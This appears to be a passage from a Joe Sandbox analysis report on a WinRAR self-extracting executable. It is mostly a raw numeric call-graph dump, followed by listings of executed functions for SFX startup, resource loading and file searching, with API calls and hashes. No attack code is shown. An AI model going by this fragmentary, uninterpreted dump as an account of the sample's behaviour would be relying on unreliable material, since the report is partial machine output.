ba801 81 API calls 25576->25581 25582 b99f3 25577->25582 25578 ba801 81 API calls 25578->25560 25580->25576 25580->25583 25581->25560 25582->25580 25768 ba50a 98 API calls 25582->25768 25600 b9b53 25583->25600 25630 ba14a 25583->25630 25771 bab1c 25583->25771 25586->25576 25769 b8b7c 124 API calls 25586->25769 25587 b9ba2 25592 bbf0a 27 API calls 25587->25592 25588 b98ed 25765 b237a 75 API calls 25588->25765 25589->25560 25589->25588 25596 b98f4 Concurrency::cancel_current_task 25589->25596 25761 b87fb 41 API calls 25589->25761 25762 be4a9 97 API calls 25589->25762 25763 b237a 75 API calls 25589->25763 25764 b8f28 99 API calls 25589->25764 25607 b9bb8 25592->25607 25596->25571 25767 b851f 50 API calls 2 library calls 25596->25767 25598 b9b41 25775 b7951 78 API calls 25598->25775 25728 bbf0a 25600->25728 25601 b9c8b 25602 b9ce7 25601->25602 25603 b9e85 25601->25603 25606 b9cff 25602->25606 25613 b9da7 25602->25613 25604 b9eab 25603->25604 25605 b9e97 25603->25605 25612 b9d20 25603->25612 25732 c4576 25604->25732 25782 ba475 138 API calls __EH_prolog 25605->25782 25609 b9d46 25606->25609 25615 b9d0e 25606->25615 25607->25601 25619 baa7a 80 API calls 25607->25619 25623 b9c62 25607->25623 25609->25612 25778 b829b 112 API calls 25609->25778 25611 b9ec4 25742 c421f 25611->25742 25621 b9e76 25612->25621 25633 b9fca 25612->25633 25783 b237a 75 API calls 25612->25783 25779 b8f6b 39 API calls 25613->25779 25777 b237a 75 API calls 25615->25777 25619->25623 25621->25474 25622 b9dec 25622->25612 25624 b9e08 25622->25624 25625 b9e1f 25622->25625 25623->25601 25776 bac9c 83 API calls 25623->25776 25780 b8037 86 API calls 25624->25780 25781 ba212 104 API calls __EH_prolog 25625->25781 25629 ba0d5 25629->25630 25631 bb8e6 3 API calls 25629->25631 25630->25578 25635 ba130 25631->25635 25632 ba083 25751 bb032 25632->25751 25633->25629 25633->25630 25633->25632 25784 bb199 SetEndOfFile 25633->25784 25635->25630 25785 b237a 75 API calls 25635->25785 25637 ba0ca 25638 ba880 78 API calls 25637->25638 25638->25629 25640 ba140 25786 b7871 77 API calls 25640->25786 25643 b1653 25642->25643 25645 b1665 Concurrency::cancel_current_task 25642->25645 25643->25645 25894 b16b2 25643->25894 25646 b2111 26 API calls 25645->25646 25647 b1694 25646->25647 25897 be339 25647->25897 25651 bb1e9 25650->25651 25652 bb1f3 25651->25652 25906 b77af 79 API calls 25651->25906 25652->25463 25654->25480 25656 bc20d __cftof 25655->25656 25661 bc0d3 25656->25661 25668 bc0b4 25661->25668 25663 bc148 25664 b2111 25663->25664 25665 b212b 25664->25665 25666 b211c 25664->25666 25665->25495 25672 b136b 26 API calls Concurrency::cancel_current_task 25666->25672 25669 bc0bd 25668->25669 25671 bc0c2 25668->25671 25670 b2111 26 API calls 25669->25670 25670->25671 25671->25663 25672->25665 25678 b1822 25673->25678 25676->25511 25677->25508 25679 b1834 25678->25679 25686 b13f2 25678->25686 25680 b185d 25679->25680 25688 b76e9 77 API calls __vswprintf_c_l 25679->25688 25682 d520e 22 API calls 25680->25682 25684 b187a 25682->25684 25683 b1853 25689 b775a 76 API calls 25683->25689 25684->25686 25690 b775a 76 API calls 25684->25690 25686->25516 25688->25683 25689->25680 25690->25686 25692 b1a8e 25691->25692 25694 b1a8a 25691->25694 25695 b19c5 143 API calls 25692->25695 25694->25520 25695->25694 25697 be3a5 25696->25697 25699 be3ac 25696->25699 25701 baa7a 25697->25701 25699->25523 25700->25525 25702 baa93 25701->25702 25704 bb110 80 API calls 25702->25704 25703 baac5 25703->25699 25704->25703 25706 cefa8 25705->25706 25707 bf937 53 API calls 25706->25707 25708 cefcb 25707->25708 25709 b4a20 _swprintf 51 API calls 25708->25709 25710 cefdd 25709->25710 25711 ce607 17 API calls 25710->25711 25712 c2eba 25711->25712 25712->25474 25713->25537 25714->25537 25715->25539 25717 b66ef 25716->25717 25789 b65fb 25717->25789 25720 b6722 25721 b675a 25720->25721 25794 bc6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25720->25794 25721->25554 25723 b89dd 25722->25723 25724 b8a15 25723->25724 25800 b7931 75 API calls 25723->25800 25724->25560 25724->25563 25724->25567 25726 b8a0d 25801 b1397 75 API calls 25726->25801 25729 bbf18 25728->25729 25731 bbf22 25728->25731 25730 cfeae 27 API calls 25729->25730 25730->25731 25731->25587 25733 c458b 25732->25733 25735 c4595 ___std_exception_copy 25732->25735 25802 b775a 76 API calls 25733->25802 25736 c461b 25735->25736 25737 c46c5 25735->25737 25741 c463f __cftof 25735->25741 25803 c44a9 76 API calls 3 library calls 25736->25803 25804 d3330 RaiseException 25737->25804 25740 c46f1 25741->25611 25743 c4228 25742->25743 25744 c4251 25742->25744 25745 c4247 25743->25745 25747 c423d 25743->25747 25750 c4245 25743->25750 25744->25750 25819 c66c4 138 API calls 2 library calls 25744->25819 25818 c739e 133 API calls 25745->25818 25805 c7dcc 25747->25805 25750->25612 25752 bb043 25751->25752 25755 bb052 25751->25755 25753 bb049 FlushFileBuffers 25752->25753 25752->25755 25753->25755 25754 bb0cf SetFileTime 25754->25637 25755->25754 25756->25545 25757->25559 25758->25552 25759->25555 25760->25589 25761->25589 25762->25589 25763->25589 25764->25589 25765->25596 25766->25596 25767->25571 25768->25580 25769->25576 25770->25580 25772 bab25 GetFileType 25771->25772 25773 b9b2b 25771->25773 25772->25773 25773->25600 25774 b237a 75 API calls 25773->25774 25774->25598 25775->25600 25776->25601 25777->25612 25778->25612 25779->25622 25780->25612 25781->25612 25782->25612 25783->25633 25784->25632 25785->25640 25786->25630 25787->25560 25788->25560 25795 b64f8 25789->25795 25791 b661c 25791->25720 25793 b64f8 2 API calls 25793->25791 25794->25720 25797 b6502 25795->25797 25796 b65ea 25796->25791 25796->25793 25797->25796 25799 bc6af CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25797->25799 25799->25797 25800->25726 25801->25724 25802->25735 25803->25741 25804->25740 25820 c479d 25805->25820 25808 c81ee 25847 c63a9 99 API calls __InternalCxxFrameHandler 25808->25847 25810 c81fe __InternalCxxFrameHandler 25810->25750 25813 c7ddd __InternalCxxFrameHandler 25813->25808 25824 be56c 25813->25824 25833 c229f 25813->25833 25839 c5001 133 API calls 25813->25839 25840 c8243 133 API calls 25813->25840 25841 c24df 25813->25841 25845 c4b0c 99 API calls __InternalCxxFrameHandler 25813->25845 25846 c889f 138 API calls __InternalCxxFrameHandler 25813->25846 25818->25750 25819->25750 25822 c47a7 __cftof ___std_exception_copy __EH_prolog 25820->25822 25821 c4892 25821->25813 25822->25821 25848 b775a 76 API calls 25822->25848 25829 be582 __InternalCxxFrameHandler 25824->25829 25825 be6f2 25826 be726 25825->25826 25849 be523 25825->25849 25853 c2121 25826->25853 25829->25825 25831 be6e9 25829->25831 25859 bbff5 92 API calls __EH_prolog 25829->25859 25860 c9c9d 118 API calls 25829->25860 25831->25813 25834 c22ab 25833->25834 25835 c22b0 25833->25835 25871 c2337 25834->25871 25837 c22c0 25835->25837 25838 c24df 82 API calls 25835->25838 25837->25813 25838->25837 25839->25813 25840->25813 25842 c24eb ResetEvent ReleaseSemaphore 25841->25842 25843 c2516 25841->25843 25886 c22fc WaitForSingleObject 25842->25886 25843->25813 25845->25813 25846->25813 25847->25810 25848->25822 25850 be52b 25849->25850 25851 be568 25849->25851 25850->25851 25861 c2e58 25850->25861 25851->25826 25854 c2128 25853->25854 25855 c2143 25854->25855 25869 b76e4 RaiseException CallUnexpected 25854->25869 25857 c2154 SetThreadExecutionState 25855->25857 25870 b76e4 RaiseException CallUnexpected 25855->25870 25857->25831 25859->25829 25860->25829 25864 ceead 25861->25864 25865 c15a3 25864->25865 25866 ceec4 SendDlgItemMessageW 25865->25866 25867 cc748 PeekMessageW KiUserCallbackDispatcher IsDialogMessageW TranslateMessage DispatchMessageW 25866->25867 25868 c2e78 25867->25868 25868->25851 25869->25855 25870->25857 25875 c2342 25871->25875 25876 c23b0 25871->25876 25872 c2347 CreateThread 25872->25875 25882 c2470 25872->25882 25874 c239f SetThreadPriority 25874->25875 25875->25872 25875->25874 25875->25876 25879 b76e9 77 API calls __vswprintf_c_l 25875->25879 25880 b7871 77 API calls 25875->25880 25881 b76e4 RaiseException CallUnexpected 25875->25881 25876->25835 25879->25875 25880->25875 25881->25875 25885 c247e 85 API calls 25882->25885 25884 c2479 25885->25884 25887 c230d GetLastError 25886->25887 25888 c2333 25886->25888 25892 b76e9 77 API calls __vswprintf_c_l 25887->25892 25888->25843 25890 c2327 25893 b76e4 RaiseException CallUnexpected 25890->25893 25892->25890 25893->25888 25903 b20ed 26 API calls Concurrency::cancel_current_task 25894->25903 25896 b16c0 25898 be34a Concurrency::cancel_current_task 25897->25898 25904 bbd8e 87 API calls Concurrency::cancel_current_task 25898->25904 25900 be37c 25905 bbd8e 87 API calls Concurrency::cancel_current_task 25900->25905 25902 be387 25903->25896 25904->25900 25905->25902 25906->25652 25908 bbaa1 25907->25908 25909 bbaba FindFirstFileW 25908->25909 25910 bbb20 FindNextFileW 25908->25910 25912 bbac9 25909->25912 25917 bbb02 25909->25917 25911 bbb2b GetLastError 25910->25911 25910->25917 25911->25917 25913 bcf32 GetCurrentDirectoryW 25912->25913 25914 bbad9 25913->25914 25915 bbadd FindFirstFileW 25914->25915 25916 bbaf7 GetLastError 25914->25916 25915->25916 25915->25917 25916->25917 25917->25485 25918->25426 25920 c3540 25919->25920 25922 c3560 Concurrency::cancel_current_task 25920->25922 25923 c2206 25920->25923 25924 c24df 82 API calls 25923->25924 25925 c2228 ReleaseSemaphore 25924->25925 25926 c2248 25925->25926 25927 c2266 DeleteCriticalSection CloseHandle CloseHandle 25925->25927 25928 c22fc 80 API calls 25926->25928 25927->25922 25929 c2252 CloseHandle 25928->25929 25929->25926 25929->25927 25930->25268 25931->25277 25932->25277 25933->25280 25934->25287 25936 bb1d2 79 API calls 25935->25936 25937 b208f 25936->25937 25938 b1ad3 116 API calls 25937->25938 25941 b20ac 25937->25941 25939 b209c 25938->25939 25939->25941 25942 b1397 75 API calls 25939->25942 25941->25296 25941->25297 25942->25941 25944 cffc0 25943->25944 25945 bb4e0 GetFileAttributesW 25944->25945 25946 bb4ca 25945->25946 25947 bb4f1 25945->25947 25946->25078 25946->25094 25948 bcf32 GetCurrentDirectoryW 25947->25948 25949 bb505 25948->25949 25949->25946 25950 bb509 GetFileAttributesW 25949->25950 25950->25946 25951->25316 25952->25319 25953->25318 25954->25330 26211 d4bc0 5 API calls _ValidateLocalCookies 26171 cbdd0 74 API calls 26212 d73d0 QueryPerformanceFrequency QueryPerformanceCounter 25962 bacd4 25966 bacde 25962->25966 25963 bacf4 25964 bae2c SetFilePointer 25964->25963 25965 bae49 GetLastError 25964->25965 25965->25963 25966->25963 25966->25964 25967 bae05 25966->25967 25968 baa7a 80 API calls 25966->25968 25967->25964 25968->25967 26172 e05d1 21 API calls __vsnwprintf_l 25977 dcce0 25978 dcce9 25977->25978 25979 dccf2 25977->25979 25981 dcbd7 25978->25981 25982 da505 _abort 38 API calls 25981->25982 25983 dcbe4 25982->25983 26001 dccfe 25983->26001 25985 dcbec 26010 dc96b 25985->26010 25988 dcc03 25988->25979 25989 da7ee __vsnwprintf_l 21 API calls 25990 dcc14 25989->25990 25991 dcc46 25990->25991 26017 dcda0 25990->26017 25994 da65a _free 20 API calls 25991->25994 25994->25988 25995 dcc41 26027 da7db 20 API calls _abort 25995->26027 25997 dcc8a 25997->25991 26028 dc841 26 API calls 25997->26028 25998 dcc5e 25998->25997 25999 da65a _free 20 API calls 25998->25999 25999->25997 26002 dcd0a ___scrt_is_nonwritable_in_current_image 26001->26002 26003 da505 _abort 38 API calls 26002->26003 26004 dcd14 26003->26004 26008 dcd98 _abort 26004->26008 26009 da65a _free 20 API calls 26004->26009 26029 da0e4 38 API calls _abort 26004->26029 26030 dbde1 EnterCriticalSection 26004->26030 26031 dcd8f LeaveCriticalSection _abort 26004->26031 26008->25985 26009->26004 26011 d5934 __cftof 38 API calls 26010->26011 26012 dc97d 26011->26012 26013 dc98c GetOEMCP 26012->26013 26014 dc99e 26012->26014 26015 dc9b5 26013->26015 26014->26015 26016 dc9a3 GetACP 26014->26016 26015->25988 26015->25989 26016->26015 26018 dc96b 40 API calls 26017->26018 26019 dcdbf 26018->26019 26022 dce10 IsValidCodePage 26019->26022 26024 dcdc6 26019->26024 26026 dce35 __cftof 26019->26026 26020 d0d6c _ValidateLocalCookies 5 API calls 26021 dcc39 26020->26021 26021->25995 26021->25998 26023 dce22 GetCPInfo 26022->26023 26022->26024 26023->26024 26023->26026 26024->26020 26032 dca43 GetCPInfo 26026->26032 26027->25991 26028->25991 26030->26004 26031->26004 26033 dcb27 26032->26033 26035 dca7d 26032->26035 26037 d0d6c _ValidateLocalCookies 5 API calls 26033->26037 26042 ddb38 26035->26042 26039 dcbd3 26037->26039 26039->26024 26041 dbd28 __vsnwprintf_l 43 API calls 26041->26033 26043 d5934 __cftof 38 API calls 26042->26043 26044 ddb58 MultiByteToWideChar 26043->26044 26047 ddb96 26044->26047 26054 ddc2e 26044->26054 26046 ddbb7 __cftof __vsnwprintf_l 26050 ddc28 26046->26050 26053 ddbfc MultiByteToWideChar 26046->26053 26047->26046 26051 da7ee __vsnwprintf_l 21 API calls 26047->26051 26048 d0d6c _ValidateLocalCookies 5 API calls 26049 dcade 26048->26049 26056 dbd28 26049->26056 26061 dbd73 20 API calls _free 26050->26061 26051->26046 26053->26050 26055 ddc18 GetStringTypeW 26053->26055 26054->26048 26055->26050 26057 d5934 __cftof 38 API calls 26056->26057 26058 dbd3b 26057->26058 26062 dbb0b 26058->26062 26061->26054 26063 dbb26 __vsnwprintf_l 26062->26063 26064 dbb4c MultiByteToWideChar 26063->26064 26065 dbb76 26064->26065 26075 dbd00 26064->26075 26066 dbb97 __vsnwprintf_l 26065->26066 26070 da7ee __vsnwprintf_l 21 API calls 26065->26070 26069 dbbe0 MultiByteToWideChar 26066->26069 26084 dbc4c 26066->26084 26067 d0d6c _ValidateLocalCookies 5 API calls 26068 dbd13 26067->26068 26068->26041 26071 dbbf9 26069->26071 26069->26084 26070->26066 26089 dc11c 26071->26089 26075->26067 26076 dbc5b 26078 da7ee __vsnwprintf_l 21 API calls 26076->26078 26082 dbc7c __vsnwprintf_l 26076->26082 26077 dbc23 26080 dc11c __vsnwprintf_l 11 API calls 26077->26080 26077->26084 26078->26082 26079 dbcf1 26097 dbd73 20 API calls _free 26079->26097 26080->26084 26082->26079 26083 dc11c __vsnwprintf_l 11 API calls 26082->26083 26085 dbcd0 26083->26085 26098 dbd73 20 API calls _free 26084->26098 26085->26079 26086 dbcdf WideCharToMultiByte 26085->26086 26086->26079 26087 dbd1f 26086->26087 26099 dbd73 20 API calls _free 26087->26099 26090 dbe48 _abort 5 API calls 26089->26090 26091 dc143 26090->26091 26094 dc14c 26091->26094 26100 dc1a4 10 API calls 3 library calls 26091->26100 26093 dc18c LCMapStringW 26093->26094 26095 d0d6c _ValidateLocalCookies 5 API calls 26094->26095 26096 dbc10 26095->26096 26096->26076 26096->26077 26096->26084 26097->26084 26098->26075 26099->26084 26100->26093 26145 d10e0 LocalFree 26173 dd1e0 GetProcessHeap 26174 cede1 DialogBoxParamW 26189 cc2e3 79 API calls 26106 b13fd 43 API calls 2 library calls 26191 c2efb GetCPInfo IsDBCSLeadByte 26176 d05f0 27 API calls 26109 ceff2 26110 cefff 26109->26110 26111 bf937 53 API calls 26110->26111 26112 cf00c 26111->26112 26113 b4a20 _swprintf 51 API calls 26112->26113 26114 cf021 SetDlgItemTextW 26113->26114 26115 cc748 5 API calls 26114->26115 26116 cf03e 26115->26116 26147 e30f0 CloseHandle

    Executed Functions

    Function 000CF04C Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 202filesleeptimeCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 000C1B7C: GetModuleHandleW.KERNEL32(kernel32), ref: 000C1B95
      • Part of subcall function 000C1B7C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000C1BA7
      • Part of subcall function 000C1B7C: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000C1BD8
      • Part of subcall function 000CB64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 000CB655
      • Part of subcall function 000CBD0B: OleInitialize.OLE32(00000000), ref: 000CBD24
      • Part of subcall function 000CBD0B: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 000CBD5B
      • Part of subcall function 000CBD0B: SHGetMalloc.SHELL32(000FA460), ref: 000CBD65
    • GetCommandLineW.KERNEL32 ref: 000CF08B
    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 000CF0B5
    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007402), ref: 000CF0C6
    • UnmapViewOfFile.KERNEL32(00000000), ref: 000CF117
      • Part of subcall function 000CED1E: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 000CED34
      • Part of subcall function 000CED1E: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 000CED70
      • Part of subcall function 000C074B: _wcslen.LIBCMT ref: 000C076F
    • CloseHandle.KERNEL32(00000000), ref: 000CF11E
    • GetModuleFileNameW.KERNEL32(00000000,00110CC0,00000800), ref: 000CF138
    • SetEnvironmentVariableW.KERNEL32(sfxname,00110CC0), ref: 000CF144
    • GetLocalTime.KERNEL32(?), ref: 000CF14F
    • _swprintf.LIBCMT ref: 000CF18E
    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 000CF1A3
    • GetModuleHandleW.KERNEL32(00000000), ref: 000CF1AA
    • LoadIconW.USER32(00000000,00000064), ref: 000CF1C1
    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9C0,00000000), ref: 000CF212
    • Sleep.KERNEL32(?), ref: 000CF240
    • DeleteObject.GDI32 ref: 000CF279
    • DeleteObject.GDI32(?), ref: 000CF289
    • CloseHandle.KERNEL32 ref: 000CF2CC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
    • API String ID: 3014515783-3710569615
    • Opcode ID: de4c71dc30ef8620f11b87f8e9f31ff32bf2a3c9ce63e0c34b4f6e84ac67de50
    • Instruction ID: 59fafb8c3a1e56e98d619765046e4759a86da351439f94b843792f541fbfba2e
    • Opcode Fuzzy Hash: de4c71dc30ef8620f11b87f8e9f31ff32bf2a3c9ce63e0c34b4f6e84ac67de50
    • Instruction Fuzzy Hash: EB610A71900341BBD310ABA1EC49FFF7BEDAB45744F04406EF645A6292DB789D84CBA2
    Function 000CB6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100memorywindowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 701 cb6c2-cb6df FindResourceW 702 cb7db 701->702 703 cb6e5-cb6f6 SizeofResource 701->703 705 cb7dd-cb7e1 702->705 703->702 704 cb6fc-cb70b LoadResource 703->704 704->702 706 cb711-cb71c LockResource 704->706 706->702 707 cb722-cb737 GlobalAlloc 706->707 708 cb73d-cb746 GlobalLock 707->708 709 cb7d3-cb7d9 707->709 710 cb7cc-cb7cd GlobalFree 708->710 711 cb74c-cb76a call d2db0 CreateStreamOnHGlobal 708->711 709->705 710->709 714 cb76c-cb78e call cb626 711->714 715 cb7c5-cb7c6 GlobalUnlock 711->715 714->715 720 cb790-cb798 714->720 715->710 721 cb79a-cb7ae GdipCreateHBITMAPFromBitmap 720->721 722 cb7b3-cb7c1 720->722 721->722 723 cb7b0 721->723 722->715 723->722
    APIs
    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,000CC91D,00000066), ref: 000CB6D5
    • SizeofResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB6EC
    • LoadResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB703
    • LockResource.KERNEL32(00000000,?,?,?,000CC91D,00000066), ref: 000CB712
    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,000CC91D,00000066), ref: 000CB72D
    • GlobalLock.KERNEL32(00000000), ref: 000CB73E
    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 000CB762
    • GlobalUnlock.KERNEL32(00000000), ref: 000CB7C6
      • Part of subcall function 000CB626: GdipAlloc.GDIPLUS(00000010), ref: 000CB62C
    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000CB7A7
    • GlobalFree.KERNEL32(00000000), ref: 000CB7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
    • String ID: PNG
    • API String ID: 211097158-364855578
    • Opcode ID: 5d55b9f1886a2720e003844bf9f69d219d7f50f209290a62c9369d3689afb68f
    • Instruction ID: a2b62d7abec444a87b5c42ab07772c96169dc65dc219dec40650cffef0975594
    • Opcode Fuzzy Hash: 5d55b9f1886a2720e003844bf9f69d219d7f50f209290a62c9369d3689afb68f
    • Instruction Fuzzy Hash: 02317071604302ABE7109F61EC89E2F7FA9EF84B91B05061DFD05D6661EB35DC50DBA0
    Function 000BBA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 835 bba94-bbab8 call cffc0 838 bbaba-bbac7 FindFirstFileW 835->838 839 bbb20-bbb29 FindNextFileW 835->839 840 bbb3b-bbbf8 call c1928 call bd71d call c2914 * 3 838->840 842 bbac9-bbadb call bcf32 838->842 839->840 841 bbb2b-bbb39 GetLastError 839->841 846 bbbfd-bbc0a 840->846 843 bbb12-bbb1b 841->843 850 bbadd-bbaf5 FindFirstFileW 842->850 851 bbaf7-bbb00 GetLastError 842->851 843->846 850->840 850->851 853 bbb02-bbb05 851->853 854 bbb10 851->854 853->854 856 bbb07-bbb0a 853->856 854->843 856->854 858 bbb0c-bbb0e 856->858 858->843
    APIs
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBABD
      • Part of subcall function 000BCF32: _wcslen.LIBCMT ref: 000BCF56
    • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAEB
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBAF7
    • FindNextFileW.KERNEL32(?,?,?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBB21
    • GetLastError.KERNEL32(?,?,?,?,000BB98B,000000FF,?,?), ref: 000BBB2D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: FileFind$ErrorFirstLast$Next_wcslen
    • String ID:
    • API String ID: 42610566-0
    • Opcode ID: cbc24d910dfea7f74d13942dc67a080cf5a035580f62513fc87b972644d13697
    • Instruction ID: a8f553e179648c525199967f667bcb6843b2bf1d157654c61a419c52e731b67c
    • Opcode Fuzzy Hash: cbc24d910dfea7f74d13942dc67a080cf5a035580f62513fc87b972644d13697
    • Instruction Fuzzy Hash: 13415E72900559ABCB25DF68CC94EEDB3B8FB48350F1005AAE56EE3201D7B46E94CF90
    Function 000B92C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000B92CB
      • Part of subcall function 000BD656: _wcsrchr.LIBVCRUNTIME ref: 000BD660
      • Part of subcall function 000BCAA0: _wcslen.LIBCMT ref: 000BCAA6
      • Part of subcall function 000C1900: _wcslen.LIBCMT ref: 000C1906
      • Part of subcall function 000BB5D6: _wcslen.LIBCMT ref: 000BB5E2
      • Part of subcall function 000BB5D6: __aulldiv.LIBCMT ref: 000BB60E
      • Part of subcall function 000BB5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 000BB615
      • Part of subcall function 000BB5D6: _swprintf.LIBCMT ref: 000BB640
      • Part of subcall function 000BB5D6: _wcslen.LIBCMT ref: 000BB64A
      • Part of subcall function 000BB5D6: _swprintf.LIBCMT ref: 000BB6A0
      • Part of subcall function 000BB5D6: _wcslen.LIBCMT ref: 000BB6AA
      • Part of subcall function 000B4727: __EH_prolog.LIBCMT ref: 000B472C
      • Part of subcall function 000BA212: __EH_prolog.LIBCMT ref: 000BA217
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB8FA
      • Part of subcall function 000BB8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000BB5B5,?,?,?,000BB405,?,00000001,00000000,?,?), ref: 000BB92B
    Strings
    • __tmp_reference_source_, xrefs: 000B9596
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
    • String ID: __tmp_reference_source_
    • API String ID: 70197177-685763994
    • Opcode ID: d21cfc374893efc4ef95636e20a4651011e1f1046e4491f9f04d8a11a1251800
    • Instruction ID: 9ade0926ed9749e1a2b1292a4d633a353bcc6ceb8cabe06cbb81a3bad641c7fb
    • Opcode Fuzzy Hash: d21cfc374893efc4ef95636e20a4651011e1f1046e4491f9f04d8a11a1251800
